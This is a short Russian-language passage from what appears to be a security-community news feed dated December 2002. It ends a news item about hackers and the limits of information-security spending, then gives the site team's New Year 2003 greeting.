интернет-кафе. Однако реальных побед не было даже в США, где на информационную безопасность тратятся миллиарды государственных и корпоративных денег. Новый 2003 год изменит отношение общественности к хакерам. Источник - http://www.cnews.ru
31/12/2002 16:24 С НОВЫМ, 2003-М, ГОДОМ!
Команда UINC поздравляет всех посетителей нашего сайта с Новым Годом! Желаем всем нашим коллегам и единомышленникам счастья в наступающем году и дальнейшего повышения профессионального мастерства! Со своей же стороны мы постараемся приложить максимум сил и возможностей, чтобы в наступающем году наш сайт стал ещё лучше и качественнее. Удачи вам всем! Источник - МЫ
|